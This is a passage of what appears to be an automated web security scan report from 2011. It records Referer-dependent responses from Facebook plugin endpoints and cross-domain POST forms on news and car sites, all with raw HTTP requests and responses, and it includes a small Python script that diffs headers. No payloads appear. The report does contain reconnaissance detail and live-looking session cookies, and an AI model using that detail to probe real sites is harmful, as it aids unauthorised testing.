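REFERER = "http://s3.cinesport.com/players/charlotteobservergeneric.html"

RESPONSE_WITH_REFERER = """HTTP/1.1 302 Moved Temporarily
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Last-Modified: Sat, 27 Aug 2011 13:30:12 EDT
Cache-Control: must-revalidate,max-age=0
Location: http://admin.brightcove.com/viewer/us20110826.2108/BrightcoveBootloader.swf?playerID=1055201224001&purl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&allowScriptAccess=always&autoStart=false&bgcolor=%23F4F4F4&debuggerID=&dynamicStreaming=true&flashID=myExperience&height=500&isUI=true&isVid=true&publisherID=315980433&videoSmoothing=true&width=300&wmode=opaque
Content-Length: 0
Date: Sun, 04 Sep 2011 01:06:08 GMT
Server:
"""

RESPONSE_WITHOUT_REFERER = """HTTP/1.1 302 Moved Temporarily
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Last-Modified: Sat, 27 Aug 2011 17:30:12 UTC
Cache-Control: must-revalidate,max-age=0
Location: http://admin.brightcove.com/viewer/us20110826.2108/BrightcoveBootloader.swf?playerID=1055201224001&allowScriptAccess=always&autoStart=false&bgcolor=%23F4F4F4&debuggerID=&dynamicStreaming=true&flashID=myExperience&height=500&isUI=true&isVid=true&publisherID=315980433&videoSmoothing=true&width=300&wmode=opaque
Content-Length: 0
Date: Sun, 04 Sep 2011 01:06:49 GMT
Server:
"""


def parse_head(raw):
    """Status line plus a lower-cased header dict (single-valued is enough here)."""
    lines = raw.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def query_params(url):
    return parse_qs(urlsplit(url).query, keep_blank_values=True)


def referer_delta(with_referer, without_referer):
    status1, h1 = parse_head(with_referer)
    status2, h2 = parse_head(without_referer)
    changed = {
        name for name in set(h1) | set(h2)
        if name not in VOLATILE_HEADERS and h1.get(name) != h2.get(name)
    }
    q1 = query_params(h1.get("location", ""))
    q2 = query_params(h2.get("location", ""))
    return {
        "status_changed": status1 != status2,
        "changed_headers": changed,
        # parameters that only exist when a Referer was sent
        "added_params": {k: v for k, v in q1.items() if k not in q2},
        # parameters present in both redirects but with different values
        "differing_params": {k for k in q1 if k in q2 and q1[k] != q2[k]},
    }


if __name__ == "__main__":
    for key, value in referer_delta(RESPONSE_WITH_REFERER, RESPONSE_WITHOUT_REFERER).items():
        print(key, value)
```

The only non-volatile difference is the Location header, and within it the only difference is a purl parameter that carries the Referer value, percent-encoded. So 18.1 is the second case from the remediation (response content updated from Referer data), not a Referer-based access control; the follow-up a tester would run, which the report does not show, is whether a crafted Referer survives into that redirect URL without encoding.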


18.2. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?href=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&layout=button_count&show_faces=false&width=100&action=like&font=arial&action=recommend&width=125 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.193.39
X-Cnection: close
Date: Sun, 04 Sep 2011 00:42:17 GMT
Content-Length: 23550

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e62c969ebc021a21222099" class="connect_widget button_count" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Recommend</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">5</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">4</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"f44c1501",fb_dtsg:"AQD3-NrH",no_cookies:1,lhsh:"SAQDASq55"};
</script>
<script>



onloadRegister(function (){Bootloader.done([])});
onloadRegister(function (){(function() { new ExternalPageLikeWidget({"viewer":0,"channelURL":"","nodeType":"link","externalURL":"http:\/\/content.usatoday.com\/communities\/campusrivalry\/post\/2011\/09\/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state\/1","pageId":null,"widgetID":"connect_widget_4e62c969ebc021a21222099","alreadyConnected":false,"viewerIsAdmin":false,"adminUrl":"","showFaces":false,"useUnlikeLink":fal
...[SNIP]...

Request 2

GET /plugins/like.php?href=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&layout=button_count&show_faces=false&width=100&action=like&font=arial&action=recommend&width=125 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.195.58
X-Cnection: close
Date: Sun, 04 Sep 2011 00:42:26 GMT
Content-Length: 23395

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e62c97245a5f2963034818" class="connect_widget button_count" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Recommend</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">5</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">4</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"b6f87946",fb_dtsg:"AQD3-NrH",no_cookies:1,lhsh:"GAQCX5XkZ"};
</script>
<script>



onloadRegister(function (){Bootloader.done([])});
onloadRegister(function (){(function() { new ExternalPageLikeWidget({"viewer":0,"channelURL":"","nodeType":"link","externalURL":"http:\/\/content.usatoday.com\/communities\/campusrivalry\/post\/2011\/09\/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state\/1","pageId":null,"widgetID":"connect_widget_4e62c97245a5f2963034818","alreadyConnected":false,"viewerIsAdmin":false,"adminUrl":"","showFaces":false,"useUnlikeLink":fal
...[SNIP]...

18.3. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Request 1

GET /plugins/likebox.php?api_key=5597051e9d2034b294865dbb43c47ee0&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dffe70414%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=true&height=62&href=http%3A%2F%2Fwww.facebook.com%2Fthecharlotteobserver&locale=en_US&sdk=joey&show_faces=false&stream=false&width=290 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.24.54
X-Cnection: close
Date: Sun, 04 Sep 2011 01:09:33 GMT
Content-Length: 8517

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
<div id="connect_widget_4e62cfccf39871a44619590" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">6,853</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a 
class="connect_widget_error_text">Error</a></span></sp
...[SNIP]...

Request 2

GET /plugins/likebox.php?api_key=5597051e9d2034b294865dbb43c47ee0&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dffe70414%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=true&height=62&href=http%3A%2F%2Fwww.facebook.com%2Fthecharlotteobserver&locale=en_US&sdk=joey&show_faces=false&stream=false&width=290 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.35.39
X-Cnection: close
Date: Sun, 04 Sep 2011 01:09:40 GMT
Content-Length: 8428

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
<div id="connect_widget_4e62cfd479f768c59733549" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">6,853</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a 
class="connect_widget_error_text">Error</a></span></sp
...[SNIP]...

18.4. http://www.facebook.com/plugins/recommendations.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Request 1

GET /plugins/recommendations.php?api_key=5597051e9d2034b294865dbb43c47ee0&font=arial&height=300&locale=en_US&sdk=joey&site=www.charlotteobserver.com&width=290 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.15.49
X-Cnection: close
Date: Sun, 04 Sep 2011 01:11:09 GMT
Content-Length: 21035

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Facebook</title><style>body{background:#fff;font-size: 11px;font-f
...[SNIP]...
<div id="u866976_1" class="fbConnectWidgetTopmost" style="height:298px; width:288px; font-family:&quot;arial&quot;, sans-serif;"><div style="overflow: hidden;height:275px; "><div class="phm fbConnectWidgetHeaderTitle uiBoxLightblue"><div class="clearfix"><div class="lfloat"><div class="fbWidgetTitle fsl fwb fcb">Recommendations</div></div><div class="rfloat"></div></div></div><div class="mhs pvm phs ConnectActivityLogin uiBoxWhite"><form action="/campaign/landing.php" target="_blank" onsubmit="return Event.__inlineSubmit(this,event)"><input name="campaign_id" value="137675572948107" type="hidden" /><input name="partner_id" value="charlotteobserver.com" type="hidden" /><input name="placement" value="recommendations" type="hidden" /><input name="extra_1" value="http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u866976_2"><input value="Sign Up" type="submit" id="u866976_2" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u866976_1&quot;).login();"><b>log in</b></a> to see what your friends are recommending.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbRecommendationWidgetContent"><div class="UIImageBlock clearfix pas fbRecommendation RES_4897caf8c883bccf"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Man&#039;s penis cut off, put through garbage disposal | CharlotteObserver.com &amp; The Charlotte Observer N" href="http://www.charlotteobserver.com/2011/07/12/2449054/police-ca-woman-cut-off-husbands.html" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQBcR6QYJsVCt4y0&amp;url=http%3A%2F%2Fmedia.charlotteobserver.com%2Fsmedia%2F2011%2F07%2F12%2F16%2F53%2F196-1fVPWN.Em.55.jpg" alt="" /></a><div 
class="UIImageBlock_Content UIIma
...[SNIP]...

Request 2

GET /plugins/recommendations.php?api_key=5597051e9d2034b294865dbb43c47ee0&font=arial&height=300&locale=en_US&sdk=joey&site=www.charlotteobserver.com&width=290 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.232.48
X-Cnection: close
Date: Sun, 04 Sep 2011 01:11:43 GMT
Content-Length: 20883

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Facebook</title><style>body{background:#fff;font-size: 11px;font-f
...[SNIP]...
<div id="u870365_1" class="fbConnectWidgetTopmost" style="height:298px; width:288px; font-family:&quot;arial&quot;, sans-serif;"><div style="overflow: hidden;height:275px; "><div class="phm fbConnectWidgetHeaderTitle uiBoxLightblue"><div class="clearfix"><div class="lfloat"><div class="fbWidgetTitle fsl fwb fcb">Recommendations</div></div><div class="rfloat"></div></div></div><div class="mhs pvm phs ConnectActivityLogin uiBoxWhite"><form action="/campaign/landing.php" target="_blank" onsubmit="return Event.__inlineSubmit(this,event)"><input name="campaign_id" value="137675572948107" type="hidden" /><input name="partner_id" value="" type="hidden" /><input name="placement" value="recommendations" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u870365_2"><input value="Sign Up" type="submit" id="u870365_2" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u870365_1&quot;).login();"><b>log in</b></a> to see what your friends are recommending.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbRecommendationWidgetContent"><div class="UIImageBlock clearfix pas fbRecommendation RES_4897caf8c883bccf"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Man&#039;s penis cut off, put through garbage disposal | CharlotteObserver.com &amp; The Charlotte Observer N" href="http://www.charlotteobserver.com/2011/07/12/2449054/police-ca-woman-cut-off-husbands.html" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQBcR6QYJsVCt4y0&amp;url=http%3A%2F%2Fmedia.charlotteobserver.com%2Fsmedia%2F2011%2F07%2F12%2F16%2F53%2F196-1fVPWN.Em.55.jpg" alt="" /></a><div class="UIImageBlock_Content UIImageBlock_SMALL_Content"><strong><a class="fbMonitor" 
href="http://www.charlotteobserver.com/2011/07/12/2449054/police-ca-woman-cut-off-husbands.html" tar
...[SNIP]...

19. Cross-domain POST
There are 4 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


19.1. http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1 HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=notre+dame+football&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:42:13 GMT
Content-Length: 48884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:pas="http://sitelifestage.usatoday.com/2009/pluckApplicationServer" xmlns:o
...[SNIP]...
<div class="form-row">
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=CampusRivalryCommunityFeed', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<input type="text" style="width:140px;margin-bottom:1px;" name="email"/>
...[SNIP]...

19.2. http://www.cars.com/go/advice/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cars.com
Path:   /go/advice/index.jsp

Issue detail

The page contains a form which POSTs data to the domain cars.repairpal.com. The form contains the following fields:

Request

GET /go/advice/index.jsp HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:25:13 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:29 GMT; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 45669

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>


<meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<div class="module-body">
       <form method="post" name="getRepairPal" id="getRepairPal" action="http://cars.repairpal.com/estimator" target="_blank">
       <p class="introParagraph">
...[SNIP]...

19.3. http://www.cars.com/go/crp/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cars.com
Path:   /go/crp/index.jsp

Issue detail

The page contains a form which POSTs data to the domain cars.repairpal.com. The form contains the following fields:

Request

GET /go/crp/index.jsp HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:25:10 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Set-Cookie: JSESSIONID=0000Wi7Ob1JlqbXe34f3Rg8tOMg:15mijjg76; Path=/
Set-Cookie: Registration=currentUserId:os2h00mIJBCqaXrpC3yMnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQuctqROfU3Gx6shhrLor0ffNW2iOUVe7nWvIF4VeWiUYU=; Expires=Fri, 02 Sep 2016 01:25:27 GMT; Path=/; Domain=www.cars.com
Set-Cookie: affiliate=national; Expires=Sun, 25 Sep 2011 01:25:27 GMT; Path=/; Domain=www.cars.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:27 GMT; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 48985

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
   

<meta http-equiv="Content-Type" content="text/html; charset=iso-
...[SNIP]...
<div class="module-body">
       <form method="post" name="getRepairPal" id="getRepairPal" action="http://cars.repairpal.com/estimator" target="_blank">
       <p class="introParagraph">
...[SNIP]...

19.4. http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charlotteobserver.com
Path:   /2011/09/03/2577566/raceday-danica-already-gone.html

Issue detail

The page contains a form which POSTs data to the domain gallery.pictopia.com. The form contains the following fields:

Request

GET /2011/09/03/2577566/raceday-danica-already-gone.html HTTP/1.1
Host: www.charlotteobserver.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=sprint&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
